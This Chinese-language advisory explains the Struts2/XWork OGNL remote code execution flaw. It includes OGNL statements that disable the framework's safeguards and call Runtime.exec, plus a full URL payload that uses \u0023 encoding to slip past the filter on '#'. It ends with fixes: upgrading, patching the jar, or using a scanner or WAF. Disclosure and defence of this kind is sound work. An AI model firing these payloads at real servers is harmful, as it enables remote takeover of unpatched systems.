这个漏洞的细节描述公布在exploit-db 上。
在这里简单摘述如下:
XWork通过getters/setters方法从HTTP的参数中获取对应action的名称,这个过程是基于OGNL(Object Graph Navigation Language)的。OGNL是怎么处理的呢?如下:
user.address.city=Bishkek&user['favoriteDrink']=kumys
会被转化成:
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
这个过程是由ParametersInterceptor调用ValueStack.setValue()完成的,它的参数是用户可控的,由HTTP参数传入。OGNL的功能较为强大,远程执行代码也正是利用了它的功能。
- * Method calling: foo()
- * Static method calling: @java.lang.System@exit(1)
- * Constructor calling: new MyClass()
- * Ability to work with context variables: #foo = new MyClass()
- * And more...
由于参数完全是用户可控的,所以XWork出于安全的目的,增加了两个方法用以阻止代码执行。
- * OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (缺省为true)
- * SecurityMemberAccess private field called 'allowStaticMethodAccess' (缺省为false)
但这两个方法可以被覆盖,从而导致代码执行。
- #_memberAccess['allowStaticMethodAccess'] = true
- #foo = new java .lang.Boolean("false")
- #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
- #rt = @java.lang.Runtime@getRuntime()
- #rt.exec('mkdir /tmp/PWNED')
ParametersInterceptor是不允许参数名称中有#的,因为OGNL中的许多预定义变量也是以#表示的。
- * #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor. denyMethodExecution' property value.
- * #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.
- * #root
- * #this
- * #_typeResolver
- * #_classResolver
- * #_traceEvaluations
- * #_lastEvaluation
- * #_keepLastEvaluation
可是攻击者在过去找到了这样的方法(bug编号XW-641):使用\u0023来代替#,这是#的十六进制编码,从而构造出可以远程执行的攻击payload。
- http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den
- yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti
- me()))=1
最终导致代码执行成功。
Struts2漏洞修复方案:
1.下载最新的版本2.3.4:http://struts.apache.org/download.cgi#struts234
2.或者修改对应jar中的ongl处理逻辑,然后编译打包替换旧的文件。
3.可使用安恒信息扫描器检测漏洞,运用安恒信息waf防护漏洞,安全点就只保留字母数字,其它的全部删除即可。